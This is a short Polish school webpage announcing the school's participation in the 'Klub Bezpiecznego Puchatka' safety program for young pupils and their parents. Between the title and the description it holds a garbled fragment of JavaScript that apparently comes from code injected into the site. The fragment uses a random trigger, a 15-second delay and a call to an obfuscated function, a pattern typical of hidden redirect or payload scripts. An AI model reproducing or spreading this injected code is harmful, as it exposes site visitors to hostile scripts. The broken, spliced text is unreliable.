Klub bezpiecznego Puchatka

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}puchatek

W bieżącym roku szkolnym nasza szkoła po raz kolejny przystąpiła do programu edukacyjnego „Klub Bezpiecznego Puchatka.” Program skierowany jest do dzieci rozpoczynających naukę w szkole. Jego celem jest poprawa bezpieczeństwa najmłodszych uczniów na drodze, w szkole, w domu i w czasie zabawy. Program ma również na celu edukację rodziców w zakresie ochrony dzieci przed zagrożeniami.